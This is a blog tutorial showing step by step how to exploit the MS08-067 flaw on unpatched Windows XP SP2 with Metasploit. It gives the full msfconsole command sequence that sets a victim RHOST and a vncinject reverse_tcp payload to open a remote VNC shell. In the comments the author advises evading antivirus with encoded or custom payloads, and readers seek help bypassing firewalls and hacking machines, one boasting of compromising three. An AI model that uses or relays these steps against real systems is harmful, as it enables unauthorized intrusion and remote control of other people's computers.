Hacker, Researcher and Author.

Attacking Windows XP SP2 With Metasploit

In the previous post related to metasploit "How To Use A Keylogger Inside Metasploit Using Meterpreter?", I explained an easy to to use keylogger inside meterpreter in order to get the victims keystrokes, However after writing that article I received some comments which disappointed me alot, The readers were asking questions like "What Is Metasploit", "What is Meterpreter", So I decided not to jump in to the advanced topics before covering the basics.

In this article I will be showing you how to use Ms08_067_Netapi exploit in an Unpatched windows xp to gain access to the machine. The original name of the exploit is "Microsoft Server Service Relative Path Stack Corruption", This exploits helps bypassing NX on various operating systems and service packs, Before we jump into the actual exploitation process, i would suggest you taking some time looking at the exploit code here.


1. Bactrack 5 
2. Windows XP SP2 Operating System

We will perform this attack on an unpatched windows xp operating system, I strongly recommend you to try it in a safe environment, Utilizing these methods in a public environment is definitely a crime.

Windows XP SP2 Setup

Before we attack the Windows XP OS, We would want to make sure that it's vulnerable and it has port 445 open.

Attacking A Windows XP Host With Metasploit

So here is how we will hack into the windows XP machine by using metasploit framework, If you are unfamiliar with Metasploit basics, Consider reading our post - Metasploit Framework Explained For Beginners.

Step 1 - First of all turn on your Backtrack 5 virtual machine .

Step 2 - Next on your console type "msfconsole", This will load the metasploit framework.

Step 3 - Next type the command "Show exploits", This will load up all the current exploits in the metasploit.

Step 4 - Next issue the "Search netapi" command in the console, This command will search for all the exploit modules with the pattern "netapi"

Step 4 - Next type "use windows/smb/ms08_067_netapi" in the console.

Step 5 - Now after the exploit has been setup, you would need to enter the RHOST, RHOST refers to the iP address of the victim. You can get the windows host iP by issuing the "ipconfig" command in the command prompt.

Step 6 - Once the exploit is setup, it's time to setup a payload, In this case we will use a Windows/shell/vncinject payloads, Issue a payload by isuing set payload windows/vncinject/reverse_tcp command in the shell, Next you need to set the proper lhost by issuing the command "lhost <iP address>".

Step 7 - Next issue the command "show options" to check to see if every thing is setup fine.

Step 8 - Once you are done with the assessment, just type "exploit" in the console, If you followed up the steps correctly you will have a vnc shell opened on the victims computer.

If you have any questions, Feel free to ask.


1. Make sure your firewall is turned on.
2. Make sure you have installed the latest updates


  1. is any way to to exploit the win xp by metasploit without disable the antivirus, firewall and automatic updates........

  2. @Nadren
    Getting around antivirus is not a harder task, even if you have the firewall is already installed, However if the system is updated it would certainly be patched with this vulnerability, The other option is to try client side exploits, this is where you social engineering skills comes into play.

  3. We have to Disable Antivirus and Firewall on victim's PC before attack..?

  4. i already disable the anti-virus, and firewall but metastability shows "Exploit Completed but No Session was Created"
    why its happen??????????????????????

  5. @Hamza
    Antivirus detection can be bypassed by your encoders to encode your payload, but firewall needs to be turned off in order for this exploit to work.

    @Naren Yadav

    Kindly send me the screenshot of the error and I will tell you where have you got it wrong.

  6. HelLoo Sir how We Can Off Firewall N Antivirus ON Victim pc ? R u JOking ? wIll I Say First To My Victim THat TUrn Off YOur Firewall N AntiVirus lOl Don't JOcking Baloch Bhai Firewall Off KArne KA TArika Batao KesE Off KArenge Victim KA Firewall Or ANtivirus MEtasploit Se??

  7. @Anonymous
    First of all I really can't understand what you are trying to say, Firewall isn't an issue, The issue is antivirus, as when the payload will be injected the antivirus will recognized as a backdoor, Professional Penetration testers use their own custom payloads.

  8. nice tut dude.....3 SP2 have owned after this ...
    dude can tell us how to hack remote desktop connection with out brutus forcing waiting for your reply...and post

  9. it doesn't work !
    [-] Exploit exception: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)

  10. hello its nice article but when i try to exploit it gives me error like "the following option failed to validate : RHOST"exploit completed but no session was created can you help me what is happend & how to solve...

  11. hey how to bypass the firewall

  12. hey how to bypass firewall

  13. U know this procedure doesn't work with WIN7 ...I mean no session is created .......Now tell me what I've to do with a WIN7 system????

  14. set SMBDomain mydomainname.tld

  15. set SMBDomain mydomainname.tld

  16. [-] Exploit exception: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)

  17. Exploit exception: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)

  18. Disabling Antivirus and Firewall before executing metasploit , is this called a HACK . HAHA :D , this is not a hack . A hack is by using a attacker system tries to disable AV / Firewall from attacker machine to victims system.

  19. Turning off firewall is not compulsory, however antivirus must be turned off because the default metasploit payloads get detected easily. So you would need to create your own custom undetectable payloads in order to bypass it.

  20. how to disable the victims antivirus?

  21. no matter what i do even when i follow the exact steps it shows the host when i scan but will not exploit it. It just keeps saying attempting to trigger the vulnerability??? even when i try metasploit and payloads it all loads but nothing ever happens on the victim machine wich is a windows xp service pack 2, with no virus protection and fire wall completely turned off?? i have no clue what may be the problem or if im doing something wrong on the host machine please help??

  22. exploit expection. the option refused by RHOST.

    exploid finihsed not session.

    this massge i got at the end ..

    how to fix it ?

  23. whts going on after step 4? + how to get victum's ip address...
    Ab.Rafay,please try to explain more in your future articles. or write 2 atricles,1 for noobs and the other for professionals..

  24. hahahah before attack victim pc disaBLE firewall and antivirus



© 2016 All Rights Reserved by RHA Info Sec. Top

Contact Form


Email *

Message *

Powered by Blogger.